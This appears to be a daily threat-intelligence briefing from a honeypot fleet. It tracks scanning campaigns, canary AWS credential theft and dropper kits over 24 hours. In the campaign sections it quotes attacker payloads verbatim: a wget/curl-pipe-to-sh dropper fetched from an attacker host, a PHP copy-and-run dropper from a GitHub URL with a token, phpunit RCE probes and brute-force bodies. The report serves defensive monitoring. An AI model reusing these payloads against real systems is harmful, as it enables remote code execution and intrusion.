FLUX FLEET — INTEL BRIEFING №15

Period: 2026-09-09 07:36 – 2026-09-10 07:36 UTC (24h digest window, day 14 of operations)
Sources: 3 honeypot nodes — canary-farm-1 (EU-hot), ai-devbox-1 (EU), control-1 (Middle East)
Confidence: High (direct observation; 14-day baseline, every result-tag spike attributed by spot query)

The digest window starts at the previous digest run time. Events from 03:36 to 07:36 UTC on 09-09 appear in both this digest and №14's data. The true new window starts at 07:36 UTC on 09-09. All times are UTC and quoted from the raw log timestamps. №14's tail (136.70.70.191's control runner at 03:53, 41.140.11.235's NIGHTAGENT run at 06:32, 213.209.159.154's control census at 04:47, and the 94.154.43.x pool probes) is overlap and is not recounted as new. control-1's log sync failed this cycle (node unreachable over SSH), so its digest numbers rest on the last synced data; every control-1 figure in this report is cross-checked against v_full and unaffected.

BLUF

The OMEGA-SWEEP single-minute census template escaped its /46 block: two new operators ran it in one window — 94.154.46.242 (Omegatech, US) hit control with 1,050 events, 1,042 paths, and 6 mints, and 176.65.144.71 (Dedik Services, CH) hit aidev with 639 events and 4 mints, both under a forged Googlebot/2.1 UA and the same 107-trap-family inventory. METADATA-HUNT ran a fifth runner day but sent only one runner (34.6.12.67, farm, 25 mints, 444 forged crawler UAs). The Tracebit funnel went silent: fleet minted 67 credentials to 29 collectors and not one reached AWS, the first zero-use window since use tracking began. NIGHTAGENT returned on a sixth ONP Morocco residential IP (160.178.89.73), ran the full kit on both EU nodes, minted 1, and its GHSAT dropper token is still unrotated in the eighth window. LIBREDTAIL-KIT ran a second consecutive window (8 IPs, all 3 nodes) and its dropper self-identifies as cve_2024_4577.selfrep.

Key Judgements

  1. The OMEGA-SWEEP census template is now multi-tenant. 94.154.46.242 ran 1,050 events across 1,042 paths and 107 trap families on control in 16 seconds (16:38–16:39 UTC) and minted 6 at /.env. 176.65.144.71 ran 639 events across 634 paths and 88 trap families on aidev in 14 seconds (21:55–21:56 UTC) and minted 4. Both used the forged Googlebot/2.1 UA, and the result profiles match №12's 94.154.46.247 record (2,100 events, 1,042 paths, 107 families) family for family. Two different hosting blocks (Omegatech US, Dedik Services CH) ran one shared wordlist inside 5 hours. (High confidence — per-IP result inventories compared by spot query; the 107-family match and the Googlebot/2.1 UA are exact, and neither IP appeared in any prior window)
  2. The canary funnel produced zero AWS use for the first time in the tracking record. The window minted 67 credentials to 29 collectors; Tracebit recorded 0 uses. The persistent-collector table shows the known hoards unchanged (94.154.46.243 at 31, 94.154.46.247 at 18, 94.154.46.248 at 10), and 159.26.110.179 — the actor that ran GetCallerIdentity in №14 — minted nothing and its credentials dropped out of the 6-day mint history with no recorded use. Stolen inventory now stands at a high-water mark with no observed consumption. (High confidence — Tracebit alert pull covers the window client-side; the 0 count is not a window-split artifact because the mint dates in the funnel all precede the window end)
  3. NIGHTAGENT is a standing rotation, not a burst. 160.178.89.73 (Office National des Postes, MA) ran the full kit at 23:00–23:34 UTC: phpunit verify <?php echo "NightAgent";?> on aidev, the unrotated dropper from raw.githubusercontent.com/nightagents/nightshell (GHSAT token, byte-identical across all 8 observed rows), form login user=root&pass=wrong, and wp-batch multiplex, on both EU nodes 10 minutes apart. This is the sixth residential MA IP and the first return after №14's idle window. (High confidence — journey and bodies quoted from v_full; the ONP ASN matches all five prior actors' IPs)
  4. LIBREDTAIL-KIT labeled its own payload. The dropper body decoded this cycle ends sh -s cve_2024_4577.selfrep — the operator names CVE-2024-4577 (phpunit CGI RCE) and marks the payload self-replicating. Seven fresh IPs plus №14's 31.132.90.3 ran the same ~49-event chain on all 3 nodes, one run each, with the ed25519-key exfil body present 32 times. (High confidence — base64 bodies decoded from bodyPreview; the selfrep tag is new this window and absent from №14's captured bodies)

Active Campaigns (day 14 status)

Recurring campaigns carry ⟳ and their registry names. First-seen signatures carry ⚠ NEW. Signatures, not IPs, are the campaign identity.

⟳ METADATA-HUNT (GCP Vite/IMDS template, forged crawler UAs) — hostile, fifth runner day, single runner

  • Actors: 34.6.12.67 (Google LLC, NL) on farm, 09:09–09:10 UTC: 839 events, 609 paths, 137 trap families, 12 POSTs, 25 mints at /.env, 444 distinct UAs. №14's control runner 136.70.70.191 (03:53 UTC on 09-09) is window overlap and is not recounted. Aidev and control drew no runner this cycle — the first single-runner window since №13.
  • TTPs: The absorbed template is unchanged: /__aws_leak_probe_<hex>__, /@fs/proc/self/environ, /@fs/root/.aws/credentials, /.azure/credentials, /proc/self/environ, actuator families, SQL dumps, and /..;/ Tomcat bypasses. The crawler-UA rotation held at 444 distinct strings (№14 range: 448–461), still mixing forged GPTBot, Claude-User, PerplexityBot, GrokBot, and mobile-browser composites.
  • Assessment: One runner per window is now the observed cadence floor. The runner minted 25 and Tracebit saw no use — the mint-to-use funnel stayed closed for this campaign after two open cycles. The farm hit also produced the docker-registry-tags and docker-registry-manifest result spikes (90 each vs 7-day 30), but spot queries attribute those to the LeakIX wave below, not to the runner.

⟳ OMEGA-SWEEP (Omegatech /46 census template, forged Googlebot/2.1) — hostile, template escaped the block

  • Actors: 94.154.46.242 (Omegatech LTD, US) on control, first appearance: 1,050 events, 16:38:45–16:39:01 UTC, 6 mints. 176.65.144.71 (Dedik Services Limited, CH) on aidev, first appearance: 639 events, 21:55–21:56 UTC, 4 mints. The №14 census operator 94.154.46.248 did not run. The /46 hoard roster stands at .243 (31 creds), .247 (18), .248 (10), .244 (12), .249 (12), all zero-use.
  • TTPs: Single-minute census, one forged Googlebot/2.1 UA, /.env mint paths inside the run. 94.154.46.242's inventory covers 107 trap families including wp-config, fake-git, k8s-secret-manifest, kubeconfig, terraform-tfstate, and webshell-probe — the №12 template path for path.
  • Assessment: A second hosting block now runs the same census wordlist. Either the template was shared, sold, or the Dedik run is the same crew on new infrastructure. The three /46-block hoards remain unused; .242 and .71 join the watch list as fresh 6- and 4-credential holders. A third operator running this wordlist would make it a commodity template.

⟳ REGISTRY-HUNT (LeakIX weblogic→docker-registry walk) — borderline scanner, fleet-wide wave, 23 mints

  • Actors: 24 l9scan IPs this window, all DigitalOcean, on farm and aidev: 167.71.81.114 (119 events), 164.90.208.56 (82), 164.92.244.132 (82), 206.189.95.232 (82), 138.68.144.227 (82), and 19 more at 39–41 events each. Two UA variants (l9scan/2.0.632323… on aidev, l9scan/2.0.234313… on farm). The docker-registry stage alone drew 43 farm IPs and 858 events — the cause of the farm docker-registry-* 3.0× spikes.
  • TTPs: The 15-step template: tarpit probe → WebLogic console → server-status → Confluence → WHM/cPanel subdomain proxies → /v2/_catalog/v2/internal/api-gateway/tags/list/v2/internal/api-gateway/manifests/latest. New this cycle: 6 POST /graphql introspection requests (3 syntax-error), including a graphql-credential-canary trap hit — the walk now probes GraphQL surfaces. One mint per IP on most runners; 23 mints total.
  • Assessment: LeakIX collected 1 mint per IP, the same shallow shape as №9–№12. The fleet held: the docker-registry stages returned fake manifests, and the GraphQL probe hit a credential canary, not a real endpoint. Report as a public leak-scanning service, distinct from criminal actors, but note the new GraphQL probe family — it will mint on any fleet node that ships an AI-graphql surface.

⟳ NIGHTAGENT (residential MA, phpunit dropper kit) — hostile, returned after 1 idle window, sixth IP

  • Actors: 160.178.89.73 (ONP, MA): aidev 23:00–23:34 UTC (188 events, 46 paths), farm 23:10–23:23 UTC (174 events, 45 paths), 1 mint on aidev at 23:02, 6 mint-failure 400s across the two nodes. №14's 41.140.11.235 (06:32–06:45 UTC on 09-08) is overlap.
  • TTPs: Unchanged, observed again: <?php echo "NightAgent";?> check, dropper <?php copy('https://raw.githubusercontent.com/nightagents/nightshell/refs/heads/main/night.php?token=GHSAT0AAAAAACYWDMT5UQIYLJJSWO5KVDNIZYGPEDA','night.php');readfile('night.php'); ?>, /whm + /openid_connect/cpanelid probes, user=root&pass=wrong login, wp-batch {"requests": [...]} multiplex (735-byte body), then a config-bundle JS walk with /..;/ bypasses.
  • Assessment: Six ONP IPs in eight windows, the same GitHub token since №9. The kit is the actor; IPs rotate inside one Moroccan ISP. The minted credential shows no AWS use. The token is now an 8-window fingerprint and still unrotated — the cheapest takedown lever the fleet has observed.

⟳ LIBREDTAIL-KIT (phpunit RCE + key exfil + shell dropper) — hostile, second window, self-rep tag added

  • Actors: 8 IPs on all 3 nodes, one run each, ~49 events in 13–120 seconds: 185.151.146.160 (farm, 22:42), 45.43.60.98 (farm, 17:24), 178.132.198.203 (farm, 15:41), 186.182.105.49 (farm, 23:00), 2.26.64.195 (control, 09:36), 23.88.108.246 (aidev, 07:01 on 09-10), 43.165.170.19 (aidev, 17:54), plus №14's 31.132.90.3 (farm, 10:29, 3 events). ASNs span residential and hosting; no concentration.
  • TTPs: Chain unchanged: md5("Hello PHPUnit") probe across eval-stdin.php permutations, shell_exec(base64_decode(...)) POST that echoes an OpenSSH ed25519 private key (32 captured bodies), then POST /bin/sh. The dropper body, verbatim after decode: (wget --no-check-certificate -qO- https://217.60.195.113/sh || curl -sk https://217.60.195.113/sh) | sh -s cve_2024_4577.selfrep. The selfrep argument and the CVE label are new.
  • Assessment: The kit runs on schedule against all nodes and still wants execution, not credentials — 0 mints. The staging host 217.60.195.113 is unchanged across both windows. The selfrep tag claims worm behavior; the fleet saw no evidence of self-propagation in the logs, so treat the claim as unverified and watch for the kit appearing from an IP that a prior run touched.

⟳ MALWARE-DICT (dropper-URL dictionary loop) — hostile, continuous, /24 grew a fourth host

  • Actors: 204.76.203.18 on control for the full true window (1,968 events, 575 paths, all GETs, 0 mints, blocklist ipsum:2), a continuous loop again after №14's 26-hour run. New sibling 204.76.203.50: 7 events, 1 path, 1 event per node across all 3 nodes (17:12–20:38 UTC) — a fourth host in the Pfcloud /24. .10 and .7 did not return.
  • TTPs: The replay dictionary held the №14 families (/kitty.*, /lol.*, /bot.*, /whoareyou, /bins/morte.*, /hiddenbin/boatnet.*). No adminer or actuator probes this cycle.
  • Assessment: The loop is now a standing background process on control, two windows running. The /24 roster is four hosts with three distinct behaviors (replay loop, adminer probe, single-path touch). The 07:36 sync failure on control-1 makes this cycle's loop count a floor, not a ceiling.

⟳ CREDSWEEP (Feo Prest promotion) — hostile, promoted from standing actor

  • Actors: 213.209.159.154 (Feo Prest SRL, DE) ran a second census-class run in a second window: farm, 23:15:02–23:15:08 UTC, 171 events, 169 paths, 6 seconds, forged MSIE-9 MALNJS UA, 0 mints. №14's control run (04:47 UTC on 09-09) is overlap. The /24's second operator, 213.209.159.175, did not return.
  • TTPs: Same census as №14: .env-variant walk plus the two webshell-sweep paths (/config.inc.php, /config.dev.php) and /.bashrc. Result profile: 119 tarpit, 26 env-production-error, 2 webshell-sweep-observed.
  • Assessment: The №14 promotion trigger (a repeat at census size on a second node) fired. The Feo Prest /24 now has two census-class operators across two windows and joins CREDSWEEP as an operator pool. Watch for a third run and for the MSIE-9 UA on other IPs.

⟳ WP-LOGIN-BRUTE (distributed credential brute) — hostile, grew but below alarm

  • Actors: 149 credential POSTs in the true window (farm 108 pairs from 82 IPs, aidev 41 pairs from 39 IPs), distinct bodies, forged browser UAs, whole-window spread.
  • Assessment: Volume moved 100 → 149 pairs across the last two true windows. The 200-pair growth alarm stays armed. No mints. Background noise.

Standing actors (persistence check)

  • 80.94.95.211 (SS-Net, RO) — eighth window in nine: aidev, 51 events, 49 paths, 1 mint at 14:34 UTC, MSIE 9 and Mail.RU_Bot UAs. 7 all-time mints, zero observed use.
  • 16.5.0.236 (Hello World UA) — SOHO-router probes on all 3 nodes, 26 events, username=admin&psd=Feefifofum POSTs verified in the window body capture. The Firefox/77 variant 85.11.167.199 also returned (3 events, aidev). Benign-shape.
  • 89.248.172.33 / 93.174.93.12 — uptime-prober set, unchanged: 54 events per node for .33, 63 on control for 93.174.93.12, /-only. Benign-shape.
  • 193.32.204.199 — returned after 5 idle days (last seen 09-04): 134 events, control 81 + farm 53, 131 fake-git results on /cms/.git/config-class paths, 7 forged UAs. A git-config walker seen on all 3 nodes since 09-01; unattributed, watch.
  • New unattributed collectors: 64.49.8.54 (138 events, /.environment* fanout 18 hits each, 13 forged Chrome/Firefox/Edge/iPhone UAs, 2 mints), 132.196.6.75 (59 events, 51 paths in 33 s, 13 UAs, 1 mint), 182.8.249.108 (python-requests/2.32.4, 1 mint on each EU node at 04:38–04:39 UTC on 09-10), 198.23.174.202 (control return: 27 paths in 11 s, forged Chrome/67, 1 mint — the №14 -error-wall actor minted this time).
  • Absent this window: 45.148.10.238 (second consecutive), 91.245.74.31 (second), 34.104.212.213, 94.154.46.248 (no new census), 35.233.85.98 (XMLRPC-BRUTE operator, silent again), 159.26.110.179, 167.99.79.44, the 147.90.209.x and 155.117.232.31 one-mint collectors, and 204.76.203.10/.7.

Benign / research (not hostile)

  • getdomaindata/1.0 (+https://getdomaindata.net) — new honest UA, 2 IPs (34.201.152.181 GCP US, 98.86.175.9 AWS us-east): 36 events each, / and /robots.txt only, tarpit only, no credential paths, no mints. Honest UA, shallow. Add to the benign list.
  • Censys (66.132.172.188) — 3 events, owns control's /cttvd0gtdq4zcsz3 random path. Censys also owns the 03:15 first-seen inventory cluster on farm (the /.git/refs/... prefix paths).
  • 18.116.101.220 (visionheight.com/scan) — third consecutive window: 2-path sweep on farm, 19 events.
  • No hostile journeys from Palo Alto, zgrab, OAI-SearchBot, ModatScanner, or ivre-masscan this window.

Canary credentials

Summary

No canary credentials were used in AWS during the window. Fleet sensors minted 67 credentials to 29 collector IPs; none reached AWS.

Mint → use funnel

Metric Count
Credentials minted (fleet, window) 67
Distinct collector IPs 29
Credentials used in AWS (alerts) 0
Credentials stolen, no observed AWS use in window 67

Per collector (evidence for attribution prose — join each IP against ip-journey and the campaign registry):

Theft IP Sensor Mints (window) Creds used in AWS Use IPs Operations Mint history (6d)
34.6.12.67 canary-farm-1 25 0 0 25 mints since 2026-09-09 09:09
94.154.46.242 control-1 6 0 0 6 mints since 2026-09-09 16:38
176.65.144.71 ai-devbox-1 4 0 0 4 mints since 2026-09-09 21:56
138.68.144.227 ai-devbox-1 2 0 0 2 mints since 2026-09-09 14:27
164.90.208.56 canary-farm-1 2 0 0 2 mints since 2026-09-09 18:18
164.92.244.132 ai-devbox-1 2 0 0 3 mints since 2026-09-03 20:42
206.189.95.232 canary-farm-1 2 0 0 3 mints since 2026-09-04 20:32
64.49.8.54 ai-devbox-1 2 0 0 2 mints since 2026-09-09 13:56
102.220.161.87 canary-farm-1 1 0 0 4 mints since 2026-09-07 23:07
132.196.6.75 canary-farm-1 1 0 0 1 mints since 2026-09-09 08:36
134.209.25.199 ai-devbox-1 1 0 0 1 mints since 2026-09-09 19:54
138.197.191.87 canary-farm-1 1 0 0 2 mints since 2026-09-06 20:30
139.59.136.184 ai-devbox-1 1 0 0 3 mints since 2026-09-05 20:41
139.59.143.102 canary-farm-1 1 0 0 1 mints since 2026-09-09 21:48
143.244.168.161 canary-farm-1 1 0 0 2 mints since 2026-09-05 20:29
157.245.36.108 canary-farm-1 1 0 0 2 mints since 2026-09-04 20:23
160.178.89.73 ai-devbox-1 1 0 0 1 mints since 2026-09-09 23:02
167.71.81.114 ai-devbox-1 1 0 0 1 mints since 2026-09-09 22:04
167.99.181.249 canary-farm-1 1 0 0 1 mints since 2026-09-09 22:02
182.8.249.108 ai-devbox-1 1 0 0 2 mints since 2026-09-10 04:38
182.8.249.108 canary-farm-1 1 0 0 2 mints since 2026-09-10 04:38
198.23.174.202 control-1 1 0 0 1 mints since 2026-09-10 03:19
206.189.19.19 ai-devbox-1 1 0 0 1 mints since 2026-09-09 22:06
207.154.212.47 canary-farm-1 1 0 0 2 mints since 2026-09-03 20:33
209.97.180.8 ai-devbox-1 1 0 0 3 mints since 2026-09-05 20:42
46.101.111.185 canary-farm-1 1 0 0 1 mints since 2026-09-09 21:44
64.226.65.160 canary-farm-1 1 0 0 1 mints since 2026-09-09 14:16
64.227.70.2 ai-devbox-1 1 0 0 2 mints since 2026-09-06 20:29
68.183.9.16 canary-farm-1 1 0 0 2 mints since 2026-09-06 20:17
80.94.95.211 ai-devbox-1 1 0 0 7 mints since 2026-09-04 02:01

Persistent collectors with no observed AWS use (candidates for hoard/resale/untraced use — check prior briefings for named campaigns):

  • 94.154.46.243: 31 mints, 2026-09-03 19:55 → 2026-09-04 03:42
  • 104.196.118.131: 25 mints, 2026-09-06 03:25 → 2026-09-06 03:25
  • 136.67.37.69: 25 mints, 2026-09-08 19:55 → 2026-09-08 19:55
  • 34.22.137.199: 25 mints, 2026-09-07 17:26 → 2026-09-07 17:26
  • 34.6.12.67: 25 mints, 2026-09-09 09:09 → 2026-09-09 09:09
  • 34.83.24.21: 25 mints, 2026-09-07 05:10 → 2026-09-07 05:10
  • 35.252.125.133: 25 mints, 2026-09-08 18:51 → 2026-09-08 18:52
  • 94.154.46.247: 18 mints, 2026-09-03 17:01 → 2026-09-06 19:02
  • 136.85.124.29: 17 mints, 2026-09-07 15:44 → 2026-09-07 15:44
  • 207.175.90.192: 13 mints, 2026-09-03 07:50 → 2026-09-03 07:50
  • 34.38.121.96: 13 mints, 2026-09-03 09:30 → 2026-09-03 09:30
  • 196.206.35.222: 12 mints, 2026-09-04 04:09 → 2026-09-04 08:26
  • 94.154.46.244: 12 mints, 2026-09-03 11:42 → 2026-09-03 11:42
  • 34.23.228.150: 11 mints, 2026-09-04 21:35 → 2026-09-04 21:35
  • 45.148.10.238: 11 mints, 2026-09-03 13:30 → 2026-09-07 12:19
  • 87.120.104.29: 11 mints, 2026-09-04 05:06 → 2026-09-06 05:06
  • 94.154.46.248: 10 mints, 2026-09-08 07:51 → 2026-09-08 07:51
  • 136.85.12.249: 8 mints, 2026-09-05 09:28 → 2026-09-05 09:28
  • 167.99.79.44: 8 mints, 2026-09-08 19:11 → 2026-09-08 20:24
  • 80.94.95.211: 7 mints, 2026-09-04 02:01 → 2026-09-09 14:34
  • 91.245.74.31: 7 mints, 2026-09-04 10:52 → 2026-09-06 21:30

Canary-use attribution (briefing prose)

The funnel closed this window. 67 mints went to 29 collectors, and Tracebit recorded zero AWS calls — no Converse chatter, no enumeration, no success. Two explanations fit the data, and the window cannot separate them: the collectors held their credentials (the hoard pattern the /46 block established), or the uses fell outside the Tracebit alert pull. The second explanation has precedent — №14's 159.26.110.179 uses trailed its mint by hours — so treat the zero as "no observed use", not "no use". 159.26.110.179's credentials left the 6-day mint history with no recorded consumption; its №14 GetCallerIdentity success remains the funnel's only non-Converse use and its only success.

Mint concentration shifted. The window's largest mint batch went to a METADATA-HUNT runner (34.6.12.67, 25), but 23 of 67 mints went to the 24 LeakIX IPs at roughly 1 per IP — LeakIX collected from more distinct sources than any single campaign this cycle. 198.23.174.202 broke its №14 pattern: the actor that drew all -error results on aidev minted on control, so the request-shape wall it hit was node-specific or run-specific, not a permanent operator trait.

Fleet Observations

  • Canary economics: True-window mints 67 to 29 collectors (farm 41, aidev 19, control 7), all ["aws"]. Digest-window mints 72 (control 11 / aidev 20 / farm 41). All-time: 850 credentials to 240 collector IPs. Mint failures: 22 × 400 in the true window (aidev 11, farm 10, control 1), zero 401s. Failure leaders: 160.178.89.73 (6, the NIGHTAGENT run racing the burst limiter on both nodes) and the LeakIX runners (2–3 each). No new failure shape.
  • XFF forgery: 0 multi-entry chains, 0 empty-clientIp rows — thirteenth consecutive clean day post-fix.
  • TLS/attribution posture: Farm served 808 https events on sso.rightabouteverything.show (2,202 Host-header events on the bare IP, 1,354 on the TLS name), aidev 767 https on inference.fapthropic.com (1,270 Host-header events on the bare IP). Control stayed deliberately certless: 0 https, 5,013 of its 5,026 Host-header events on the bare IP.
  • Volume: Digest window 11,029 events (farm 3,565 −36% / aidev 2,438 −89% / control 5,026 +51%). The aidev −89% is the absence of CRUSADER-SWEEP's №12 git-mirror class plus no big census until 21:55. Control's +51% is the 204.76.203.18 loop (2,309), the 94.154.46.242 census (1,050), and №14-tail overlap (136.70.70.191's 837). True-window totals: farm 3,548 / aidev 2,440 / control 3,681. Every ≥700-event hour attributed: control 03:00 (875) = 136.70.70.191 №14-tail runner; farm 09:00 (879) = 34.6.12.67 runner; control 16:00 (1,150) = 94.154.46.242 census; aidev 21:00 (756) = 176.65.144.71 census + LeakIX evening wave; farm 20:00 (420) = 43.228.157.68 walk; farm 23:00 (439) = 160.178.89.73 + 213.209.159.154.
  • Control discovery velocity: Day-14 ramp reads 39 → 70 → 88 → 107 → 105 → 105 → 100 → 98 → 99 → 108 → 120 → 110 → 78 unique IPs (true window). Volume rose while unique IPs fell for the second window: the loop, the census, and the LIBREDTAIL runs dominate, so per-visitor depth grew again. The fresh-IP differential holds.
  • Result-tag spikes: farm fake-git-error 177 vs 7-day 5.0 (35.4×) — 169 events are 43.228.157.68's walk, 8 are LeakIX and NIGHTAGENT touch-frames. farm docker-registry-tags/manifests 90 each vs 30 (3.0×) — the LeakIX wave (43 IPs). All three spikes attributed.
  • Digest quirks (all re-checked this run): control-byte-stripped copy needed for UTF-8 reads; +4 h timestamp cast; single-writer DuckDB lock (all spot queries ran sequentially); sync-arrival first-seen stamps; window overlap with №14 cross-checked before counting anything new. New this cycle: control-1 log sync failed (ssh root@100.127.175.34 unreachable); the digest completed on last-synced data and the wrapper flagged it. Re-check node reachability before the next run; if the failure repeats, control's window will develop a hole.
  • Infrastructure: no fleet-side changes this cycle. control-1 sync failure is the one operational exception, noted above.

Gaps / Next Collection

  1. Why did zero credentials reach AWS? Two candidate explanations — holding and pull-window — need one check each: pull Tracebit alerts for the full mint history of the window's 29 collectors (uses can trail the flux log cutoff), and re-check the 159.26.110.179 credentials outside the flux window. If the next window is also zero-use against a growing mint count, the hoard is compounding and the resale hypothesis strengthens.
  2. The census template's tenant count. Two blocks ran the OMEGA-SWEEP wordlist this cycle. A third operator (check for the forged Googlebot/2.1 UA plus a ~1,040-path single-minute run) makes it a commodity; diff each new run's inventory against №12's 94.154.46.247 baseline for wordlist drift.
  3. METADATA-HUNT runner count. One runner this window broke a four-window three-runner pattern. A zero-runner window next cycle suggests a pause after 5 runner days; check whether the ORACLE-SWEEP absorbed families stay inside the template.
  4. LIBREDTAIL selfrep claim. The dropper labels itself self-replicating. Cross-check the spark (Arkime) pcaps for connections from fleet-node IPs to 217.60.195.113 or between nodes, and compare the ed25519 key bodies across the 8 runs — a shared key links the operator instance; per-run keys mean a key generator.
  5. control-1 sync recovery. Check node reachability before the next run (ssh root@100.127.175.34 true). A second failure means a 24-hour blind spot on the differential node and breaks the control-velocity dataset.
  6. 43.228.157.68 (Ghosty Networks, PK). First-seen git-vault walk (169 fake-git-error events, /.git/refs/*/.env prefix variants, blocklisted ipsum:2+firehol2). A second run promotes it to a campaign; the /.git/refs/heads/<ref>/.env prefix shape is its fingerprint.

Generated on medina (headless systemd run). Digest: /data/flux-logs/reports/flux-digest-2026-09-10.md. Spot queries: flux-query.sh fleet-24h, crossnode-reuse, mint-health, mint-collectors, ip-journey (160.178.89.73), plus 20 ad-hoc v_full queries (top-talker profiles, spike attribution, NIGHTAGENT body capture, LIBREDTAIL dropper decode, Pfcloud /24 roster, mint roster, standing-actor persistence, WP-LOGIN-BRUTE volume, OMEGA template comparison) and the Tracebit canary-section generator.